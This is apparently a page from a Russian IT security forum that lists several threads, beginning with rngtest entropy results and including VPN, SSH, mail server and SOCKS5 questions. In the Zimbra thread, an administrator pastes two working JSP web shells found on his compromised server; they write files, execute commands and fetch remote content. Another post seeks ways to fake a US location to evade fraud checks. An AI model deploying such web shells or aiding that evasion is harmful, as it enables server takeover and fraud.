    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 5
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha224
    rngtest: FIPS 140-2 successes: 9992
    rngtest: FIPS 140-2 failures: 8
    rngtest: FIPS 140-2(2001-10-10) Monobit: 2
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 3
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha384
    rngtest: FIPS 140-2 successes: 9992
    rngtest: FIPS 140-2 failures: 8
    rngtest: FIPS 140-2(2001-10-10) Monobit: 3
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 1
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    tiger
    rngtest: FIPS 140-2 successes: 9991
    rngtest: FIPS 140-2 failures: 9
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 2
    rngtest: FIPS 140-2(2001-10-10) Runs: 4
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    2.


    date +%-N%s |b2sum |sed 's/[ -]//g'

    sha1
    rngtest: FIPS 140-2 successes: 9990
    rngtest: FIPS 140-2 failures: 10
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 5
    rngtest: FIPS 140-2(2001-10-10) Long run: 4
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha224
    rngtest: FIPS 140-2 successes: 9993
    rngtest: FIPS 140-2 failures: 7
    rngtest: FIPS 140-2(2001-10-10) Monobit: 2
    rngtest: FIPS 140-2(2001-10-10) Poker: 2
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 1
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha384
    rngtest: FIPS 140-2 successes: 9994
    rngtest: FIPS 140-2 failures: 6
    rngtest: FIPS 140-2(2001-10-10) Monobit: 0
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 4
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    tiger
    rngtest: FIPS 140-2 successes: 9994
    rngtest: FIPS 140-2 failures: 6
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    3.


    original (Pseudo entropy file: "ASCII text, with very long lines" ~100K)
    Like:
    dd if=/dev/urandom status=none |tr -dc 0-9A-Za-z_+\-:\.,\ /\[\]\<\>\(\)\#\\n |dd bs=1b count=200 status=none

    sha1
    rngtest: FIPS 140-2 successes: 9994
    rngtest: FIPS 140-2 failures: 6
    rngtest: FIPS 140-2(2001-10-10) Monobit: 0
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 3
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha-224
    rngtest: FIPS 140-2 successes: 9993
    rngtest: FIPS 140-2 failures: 7
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 4
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha-384
    rngtest: FIPS 140-2 successes: 9991
    rngtest: FIPS 140-2 failures: 9
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 4
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    tiger
    rngtest: FIPS 140-2 successes: 9997
    rngtest: FIPS 140-2 failures: 3
    rngtest: FIPS 140-2(2001-10-10) Monobit: 0
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 1
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    4.


    integer (Pseudo entropy integer: >1500 digits)
    Like:
    dd if=/dev/urandom status=none |tr -dc 0-9 |dd bs=1b count=3 status=none

    sha1
    rngtest: FIPS 140-2 successes: 9989
    rngtest: FIPS 140-2 failures: 11
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 4
    rngtest: FIPS 140-2(2001-10-10) Long run: 5
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha-224
    rngtest: FIPS 140-2 successes: 9988
    rngtest: FIPS 140-2 failures: 12
    rngtest: FIPS 140-2(2001-10-10) Monobit: 3
    rngtest: FIPS 140-2(2001-10-10) Poker: 2
    rngtest: FIPS 140-2(2001-10-10) Runs: 5
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha-384
    rngtest: FIPS 140-2 successes: 9995
    rngtest: FIPS 140-2 failures: 5
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 3
    rngtest: FIPS 140-2(2001-10-10) Long run: 1
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    tiger
    rngtest: FIPS 140-2 successes: 9988
    rngtest: FIPS 140-2 failures: 12
    rngtest: FIPS 140-2(2001-10-10) Monobit: 2
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 6
    rngtest: FIPS 140-2(2001-10-10) Long run: 6
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 1

    5.


    hashed (Pseudo entropy hexadecimal: <=1172 symbols)
    Like:
    dd if=/dev/urandom status=none |tr -dc 0-9a-f |dd bs=1172c count=1 status=none

    sha1
    rngtest: FIPS 140-2 successes: 9990
    rngtest: FIPS 140-2 failures: 10
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 3
    rngtest: FIPS 140-2(2001-10-10) Long run: 6
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha-224
    rngtest: FIPS 140-2 successes: 9991
    rngtest: FIPS 140-2 failures: 9
    rngtest: FIPS 140-2(2001-10-10) Monobit: 3
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 4
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha-384
    rngtest: FIPS 140-2 successes: 9995
    rngtest: FIPS 140-2 failures: 5
    rngtest: FIPS 140-2(2001-10-10) Monobit: 0
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    tiger
    rngtest: FIPS 140-2 successes: 9989
    rngtest: FIPS 140-2 failures: 11
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 6
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    сообщить модератору +/ответить


Удаленный доступ по SSH (удаленный рабочый стол, Sshd и т.д.), !*! lori, (Шифрование, SSH, SSL / Другая система) 30-Май-24, 01:58  [ | | | ] [линейный вид] [смотреть все]
Добрый день!

Меня как и многих очень интересует сохранение приватности и повышенной безопасности, что натолкнуло к побуждению вопроса знатокам:

есть ли программа под Linux\Windows (ЧТО ВАЖНО - с графическим интерфейсом а не коммандной строкой!) для подключения ПК удаленного рабочего стола к другому ПК по SSH + подключению накопителя SSD и др. + передача\приём данных через SSH туннель между любыми юзерами сети интернет?

+ какие-нибудь доп фичи ? Типа синхронизации файлов по SSH?

Что бы никакая Яровaя свой nose не сувала и не пронюхивала

Мерси!

  • Ты думаешь перекачку твоих гигабайтов данных через SSH так трудно заметить , !*! Виктор (??), 01:41 , 01-Июн-24 (4)
    Ты думаешь перекачку твоих гигабайтов данных через SSH так трудно заметить?
    сообщить модератору +/ответить
  • Виндовс головного мозга Может лучше не заниматься ничем таким, за что статья пре, !*! Аноним (5), 13:00 , 01-Июн-24 (5) +2
    >есть ли программа под Linux\Windows
    >ЧТО ВАЖНО - с графическим интерфейсом а не коммандной строкой!
    >приватности и повышенной безопасности

    Виндовс головного мозга.

    >Что бы никакая Яровaя свой nose не сувала и не пронюхивала

    Может лучше не заниматься ничем таким, за что статья предусмотрена?

    Тебе надо понять, что никакой "приватности и повышенной безопасности" не существует. Это просто слова. Повышенная безопасность - это примерно как вторая свежесть. Есть риски, которые могут быть снижены за счет определенных практик. Начать надо с понимания рисков. Дальше осваивать практики. Это не так, что ты поставишь варезину и дальше у тебя все хорошо. Безопасность - это процесс (а не продукт) (с) Брюс Мартинович Шнайер

    Переходим к идее удаленных столов. Она естественна только для мира виндовс, где изначально не было криптографии, особенно для шифрования файлов и дисков. Та, что появлялась, каждый раз оказывалась ненадежной или была скомпрометирована. Кажется логично хранить свой чайлдпорн за пределами своего компьютера. Риск в данном случае в компрометации локального компа, получении доступа к данным.

    С удаленным столом рисков по факту становится только больше. Нельзя исключать доступ к серверу сотрудников датацентра или какой-нибудь служебный бэкдор для управления серверами (OWH ставило раньше ОС со своим кастомным ядром для этих целей). В виртуализированной среде говорить о какой-либо безопасности нельзя вообще. Химичат и с памятью, и с блочными устройствами. Ключи для расшифровки блочного устройства всегда можно взять из памяти.
    Даже если арендовать сервер без BMC, попросить к нему IP-KVM и поставить систему с нуля, любая незапланированная перезагрузка - это компрометация сервера, необходимость переустановки, смена всех ключей доступа. Об этом хотя бы есть шансы узнать. По факту для компрометации сервера достаточно воткнуть USB устройство. Сразу после этого очищаются все логи и внедряется руткит.
    Даже чтобы охватить всю проблематику связанную с безопасной настройкой серверов под хранение чувствительных данных, нужно серьезно понимать в вопросах администрирования и безопасности.

    TLDR Tails и LUKS на локалхосте используй.

    сообщить модератору +2 +/ответить
Kaspersky сканер для Linux, !*! Rodin, (ПО для тестирования и диагностики / Linux) 16-Май-24, 15:38  [ | | | ] [линейный вид] [смотреть все]
Состоялся релиз бесплатного сканера Kaspersky Virus Removal Tool для Linux. Позволяет просканировать ОС на малвару и вылечить её.

Скачать тут
https://www.kaspersky.ru/downloads/free-virus-removal-tool
https://www.kaspersky.com/downloads/free-virus-removal-tool

Список поддерживаемых дистрибутивов
https://support.kaspersky.com/help/kvrt/2024/ru-ru/269440.htm
https://support.kaspersky.com/help/kvrt/2024/en-us/269440.htm

Как запустить
https://support.kaspersky.com/help/kvrt/2024/ru-ru/269465.htm
https://support.kaspersky.com/help/kvrt/2024/en-us/269465.htm

oid для IMEI, !*! йцукенфывап, (Разное / Другая система) 10-Апр-24, 10:43  [ | | | ] [линейный вид] [смотреть все]
Добрый день.

Захотелось добавить IMEI в сертификат но похоже такого специально выделенного атрибута нет. https://www.alvestrand.no/objectid/2.5.4.html
Может я что то не нашел.

Memory erasure in Kodachi, !*! rt000, (ПО для увеличения безопасности) 14-Апр-24, 03:15  [ | | | ] [линейный вид] [смотреть все]
Всем привет, Уважаемые!
Очень надеюсь на вашу помощь, тк знаю что в ру комьюнити много талантов)

В Tails, когда дергаешь флешку, сразу кидает в консоль, где идет очистка рам и выключение ос.
В кодачи я такое не нашел, при извлечении флешки не происходит ничего, кроме того, что весь софт перестает работать (при этом DE полностью работает). У них есть в дашборде только настройки, где запуск скриптов чистки кеш/рам и тд можно задать по таймеру, это хорошо, но главное для меня - чтобы все чистилось и потом исчезало сразу после извлечении юсб накопителя.

https://tails.net/contribute/design/memory_erasure/
Тут есть и исходники этого функционала, но как прикрутить это все к кодачи?


Я сначала спрагишивал конечно у чат гпт и он мне дал баш скрипт вотчдога, который будет следить за юсб устройствами и выключать ОС. Но достаточно ли этого?

Заражение браузера, в CSS прописаны 'левые сайты', !*! revun, (Блокирование спама и вирусов / Другая система) 22-Ноя-21, 14:44  [ | | | ] [линейный вид] [смотреть все]
Всем доброго времени суток!

Система Windows X. Проблема с заражением браузера.

Спецом не являюсь так что прошу заранее прощения за отсутствие сленга и "свободное плавание" в вопросе.
При изучении кода браузеров - эдж/хром/мозила обнаружил теги не присущие для сайтов прописаны в теге style, а также ссылки ведущие на всякие непонятные сайты.
при просмотре с других устройств таких паразитов не обнаруживается, потому считаю, что заражено именно моё устройство. Использование MBAM, Kaspersky, DRWeb и прочими не выявляет источник заразы.

Заранее благодарен.

  • gt оверквотинг удален Вы один пользуетесь компьютером и этой учеткой , !*! Павел Отредиез (ok), 17:02 , 22-Ноя-21 (1)
    >[оверквотинг удален]
    > Система Windows X. Проблема с заражением браузера.
    > Спецом не являюсь так что прошу заранее прощения за отсутствие сленга и
    > "свободное плавание" в вопросе.
    > При изучении кода браузеров - эдж/хром/мозила обнаружил теги не присущие для сайтов
    > прописаны в теге style, а также ссылки ведущие на всякие непонятные
    > сайты.
    > при просмотре с других устройств таких паразитов не обнаруживается, потому считаю, что
    > заражено именно моё устройство. Использование MBAM, Kaspersky, DRWeb и прочими не
    > выявляет источник заразы.
    > Заранее благодарен.

    Вы один пользуетесь компьютером и этой учеткой?

    сообщить модератору +/ответить
  • 11 само себя не поставит Время пришло , !*! DeerFriend (?), 20:03 , 22-Ноя-21 (3)
    11 само себя не поставит. Время пришло.
    сообщить модератору +/ответить
  • Наверное X Window System X Window не связана с кодом браузеровЭмм, покажите исх, !*! ыы (?), 20:17 , 22-Ноя-21 (4)
    > Всем доброго времени суток!
    > Система Windows X. Проблема с заражением браузера.

    Наверное X Window System ?

    > При изучении кода браузеров - эдж/хром/мозила

    X Window не связана с кодом браузеров

    > обнаружил теги не присущие для сайтов

    Эмм, покажите исходник где нашли такое...

    > прописаны в теге style, а также ссылки ведущие на всякие непонятные сайты.

    Удалите их

    > при просмотре с других устройств таких паразитов не обнаруживается

    Возможно все дело в том чем вы смотрите


    сообщить модератору +/ответить
pfsense, l2tp и постоянные попытки коннекта, !*! Olenevod, (Разное / FreeBSD) 15-Янв-24, 16:02  [ | | | ] [линейный вид] [смотреть все]
есть МСЭ на базе pfSense 2.7, на нём установлен L2TP сервер, около 100 клиентов. Авторизация через RADIUS сервер на базе MS NPS + AD. Возникла следующая ситуация:
раз в пять секунд идёт входящий звонок на Pfsense
Jan 15 15:29:59     l2tps     47858     L2TP: Control connection 0x185218dc0110 xxx.xxx.xxx.xxx 1701 <-> yyy.yyy.yyy.yyy 1701 connected  (где ххх - адрес интерфейса pfSense, на котором поднят L2TP сервер)
Jan 15 15:29:59     l2tps     47858     L2TP: Incoming call #99049 via connection 0x185218dc0110 received
Jan 15 15:29:59     l2tps     47858     [l2tp_l-67] L2TP: Incoming call #99049 via control connection 0x185218dc0110 accepted  
открывается линк,  идёт попытка синхронизации протокола шифрования логин-пароля. но нет
Jan 15 15:29:59     l2tps     47858     [l2tp_l-67] LCP: auth: peer wants nothing, I want CHAP
Тем не менее, логин-пароль отправляются на радиус, где благополучно отклоняются
Jan 15 15:29:59     l2tps     47858     [l2tp_l-67] RADIUS: Authenticating user 'Aleksandra'
Jan 15 15:29:59     l2tps     47858     [l2tp_l-67] RADIUS: Rec'd RAD_ACCESS_REJECT for user 'Aleksandra'
после чего идёт разрыв соединения.

Jan 15 15:29:59     l2tps     47858     [l2tp_l-45] Link: Shutdown
а дальше интересно. Идёт новый звонок, но уже без указания ip подключения, просто incoming Call #99050 и по кругу. До тех пор пока не проходит следующая запись
Jan 15 15:53:46     l2tps     47858     L2TP: Control connection 0x185218dc0110 terminated: 0 (no more sessions exist in this tunnel)
и вот тогда снова первой записью очерезного звонка будет запись с указанием ip адресов.
попытка в файрволле закрыть все входящие с адреса yyy на интерфейсе WAN с перезапуском l2tp сервера ни к чему не привели. Звонки продолжаются. Вот как с этим бороться?

  • забыл что l2tp это во-первых udp и во-вторых внутри ipsec и наблокировал не то , !*! Ann None (?), 18:03 , 16-Янв-24 (1)
    > попытка в файрволле закрыть все входящие с адреса yyy на интерфейсе WAN
    > с перезапуском l2tp сервера ни к чему не привели.

    забыл что l2tp это во-первых udp и во-вторых внутри ipsec и наблокировал не то?

    сообщить модератору +/ответить
Strongswan IKEV2 не подключаются больше одного устройства сети, !*! CrowKIller, (VPN, IPSec) 20-Мрт-22, 21:38  [ | | | ] [линейный вид] [смотреть все]
Настроил ikev2 сервер по двум инструкциям
https://vc.ru/dev/66942-sozdaem-svoy-vpn-server-poshagovaya-...
https://habr.com/ru/company/ruvds/blog/498924/
Сперва по первой, потом по второй с переустановкой системы.
Хостинг RUVDS
Не могу подключиться с двух устройств, которые находятся в одной и той же сети.
Поведение следующее:
Роутер TP-link archer AX50
К роутеру по WIFI подключено несколько устройств
1. Подключаю впн на одном из девайсов. Подключается и работает.
2. Подключаю впн с той же настройкой на втором устройстве. Подключение прошло. IP адрес выделен. Интернета нет. Со стороны сервера выданный IP адрес не пингуется.
Это ограничение? Или нужно настроить как-то роутер или сервер?
Настроить TLS на EXIM-е (SMTP сервере), !*! korbnik, (Шифрование, SSH, SSL / Linux) 02-Ноя-23, 12:25  [ | | | ] [линейный вид] [смотреть все]
Добрый день!

Кто-нибудь использовал TLS при настройке почты на SMTP сервере EXIM ?
Нужно чтобы проходящая через EXIM почта шифровалась уходя во вне.
Например на внешний домен mail.ru почта зашифровывалась.
Можно ли так сделать или есть какие-то другие варианты конфигурации ?

Заранее благодарен, Борис.

UDP через SOCKS5, !*! WeSTMan, (Разное / Другая система) 20-Июн-20, 13:02  [ | | | ] [линейный вид] [смотреть все]
Всем привет. Не могу понять почему не работает UDP через SOCKS5. Что я делаю:

Я соединяюсь с SOCKS сервером и говорю, что хочу сделать UDP ASSOCIATE. В ответ на это SOCKS высылает IP и Port - куда можно слать UDP.

Я генерирую UDP пакет на этот адрес и порт с содержимым:

2 байта резерв

1 байт - фрагмент

1 байт - протокол ipv4

4 байта IP адрес куда надо отправить UDP с SOCKS

2 байта - порт куда отправить

3 байта - данные. В результате получился такой набор:

000001015f1f2e01029a313233

2 байта резерв + 1 фрагмент + ip = 95.31.46.1 + порт 666 + данные 123.

Все это дело отправляю на SOCKS5. Но к сожалению, на сервер 95.31.46.1:666 ничего не приходит.

Подскажите, пожалуйста, что я сделал неверно

  • Подробно описал то, что в общем-то значения не имеет, ничего не сказал о том, чт, !*! Аноним (1), 14:26 , 20-Июн-20 (1)
    > Подскажите, пожалуйста, что я сделал неверно

    Подробно описал то, что в общем-то значения не имеет, ничего не сказал о том, что может дать пищу для ума. Что за сервер, как именно данные отправляешь, что на сервере с файрволлом, что на клиенте с файрволлом...


    сообщить модератору +/ответить
  • зачем там 01 стоит если это начало большой датаграммы, что не влезла в один пак, !*! Аноним (2), 14:31 , 20-Июн-20 (2)
    > 1 байт - фрагмент

    зачем там 01 стоит? если это начало большой датаграммы, что не влезла в один пакет, то должен быть последующий с увеличенным номером, и финальный с >=0x80

       Поле FRAG показывает, является ли эта датаграмма самостоятельной или
       же фрагментом. Если датаграмма - фрагмент, то установленный старший
       бит является признаком последнего фрагмента, в то время как значение
       X'00' показывает, что это обычная датаграмма. Значения от 1 до 127
       обозначают на позицию фрагменте в последовательности. Каждый
       получатель будет иметь REASSEMBLY QUEUE (очередь сборки) и REASSEMBLY
       TIMER (таймер сборки) связанные с такой фрагментной датаграммой.
       Очередь сборки должна быть переинициализирована и связанные с ЙЙней
       фрагменты выкинуты всякий раз при истечении таймера сборки или
       с приходом новой датаграммы, чье значение в поле FRAG меньше,
       чем наибольшее значение поля FRAG датаграмм, обработанных
       при сборке фрагмента. Таймер сборки должен быть не менее 5 секунд.
       Приложениям рекомендуется избегать фрагментацию везде, где только
       это возможно.

       Реализация фрагментации опциональна, в реализациях где фрагментация
       не поддерживается, должны отбрасываться любые датаграммы, у которых
       поле FRAG отлично от X'00'.

    сообщить модератору +/ответить
Скрыть реальный ай-пи, !*! bp1136, (VPN, IPSec / Linux) 15-Окт-23, 11:50  [ | | | ] [линейный вид] [смотреть все]
Очень хотелось бы получить помощь специалистов безопасности .
Через прокси-сайт пытался выдать себя за американца , но был заблочен с пояснениями -
Our automatic security system detected that 25-th of September 2023 several times when you were logged in your account from American IP address, your ISP and DNS were from Ukrainian Company "Vodafone UA".
Для разблокировки издевательски предложили -
To complete verification procedure you must upload your American Passport or American Drivers License scanned copy and American Utility Bill on the Settings page.
Таких проблем не возникает у русских юзеров , никаких разоблачений.
Очень возможно что украинский интернет фильтруется на предмет разведданных или чего то подобного , даже кто то подсказал про технологию MITM.
Использовать VPN даже не пытался потому что был предупреждён - VPN использовать нельзя, его использование научились вычислять. Также нельзя использовать вместе VPN и прокси-сайт, потому что такое сочетание может вызвать конфликт в работе прокси-сайта и выдать настоящий IP.
Вот такая проблемка , за подсказку которая сработает готов заплатить , можно криптой .
Приватно ------burtya11@gmail.com




Exim 'бомбят', !*! Дмитрий, (Блокирование спама и вирусов) 30-Сен-23, 17:28  [ | | | ] [линейный вид] [смотреть все]
Доброго времени суток!

В логах Exima очень много записей такого типа:

2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <loe4149sqs1me@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <alexxus@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <ayat@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <kendel@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <kalie@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <eliverto@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <kashlyn@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <dillinger@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <jawon@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <jaleen@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <mcarthur@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <mearl@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <avilene@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <labria@malwin.com>: Unknown user

...

Как можно ограничить, допустим, 5 а остальное все drop'ить? Или тут надо смотреть в сторону iptables?

Новый tcp/ip ? Кто разобрался ?, !*! Аноним, 17-Ноя-21, 20:34  [ | | | ] [линейный вид] [смотреть все]
https://www.ft.com/content/c78be2cf-a1a1-40b1-8ab7-904d7095e...

Телепортацией и галограммами меня не удивить, а вот что за новый такой tcp/ip предлагают и в чем его суть, я так понимаю что оно нацелено на танкистов сидящих за натом ? Или я чего-то не так понимаю. Никто не изучал вопрос ?

Существуют ли бесплатные wireguard сервера?, !*! anonymous, (VPN, IPSec / Linux) 30-Янв-23, 14:07  [ | | | ] [линейный вид] [смотреть все]
Собственно сабж.

Потому что OpenVPN уже месяц как не работает у провайдера (пользовался списком серверов с Цукубы). Вот то ли новомодный пробовать, то ли искать способы обхода для вполне традиционной технологии. Ваше мнение? Рассмотрю альтернативные предложения. Раньше ещё пользовался PowerTunnel.

Zimbra поломали, !*! BarS, (Linux привязка / Linux) 25-Янв-21, 15:43  [ | | | ] [линейный вид] [смотреть все]
Зашел в консоль, а там 4 админа в аккаунтах, по каталогам полазил, есть новые файлы. Наружу админка закрыта, походу по уязвимостям хакнули. Нашел разные файлы, вот один из них
<%
    if("toe0Kq".equals(request.getParameter("pwd")))
    {
        String strCode=request.getParameter("code");
        String strFile=request.getParameter("file");
        if(strCode!=null&&strFile!=null)
        {
            java.io.InputStream in = new java.io.ByteArrayInputStream(strCode.getBytes());
            byte[] b = new byte[1024];
            java.io.ByteArrayOutputStream bs = new java.io.ByteArrayOutputStream();
            int a = -1;
            while ((a = in.read(b)) != -1)
            {
                bs.write(b, 0, a);
            }
            new java.io.FileOutputStream(application.getRealPath("/")+"/img/"+strFile).write(bs.toByteArray());
        }
        out.print("XkaGrVj9");
    }
%>
  • if G5X49Q equals request getParameter pwd String strCmd, !*! BarS (??), 15:47 , 25-Янв-21 (1)
    <%
        if("G5X49Q".equals(request.getParameter("pwd")))
        {
            String strCmd=request.getParameter("cmd");
            String strUrl=request.getParameter("url");
            String strFile=request.getParameter("file");
            if(null!=strCmd)
            {
                java.io.InputStream in=Runtime.getRuntime().exec(strCmd).getInputStream();
                int a = -1;
                byte[] b = new byte[2048];
                out.print("<pre>");
                while((a=in.read(b))!=-1)
                {
                    out.println(new String(b));
                }
                out.print("</pre>");
            }
            if(null!=strUrl&&null!=strFile)
            {
                java.io.InputStream in = new java.net.URL(strUrl).openStream();
                byte[] b = new byte[1024];
                java.io.ByteArrayOutputStream baos = new
                java.io.ByteArrayOutputStream();
                int a = -1;
                while ((a = in.read(b)) != -1)
                {
                    baos.write(b, 0, a);
                }
                new java.io.FileOutputStream(application.getRealPath("/")+"/"+strFile).write(baos.toByteArray());
            }
            out.println("MtGqKu3y");
        }
        else
        {
            //out.println("no token");
        }
    %>
    сообщить модератору +/ответить
 
Пометить прочитанным Создать тему
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | Архив | Избранное | Мое | Новое | | |



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру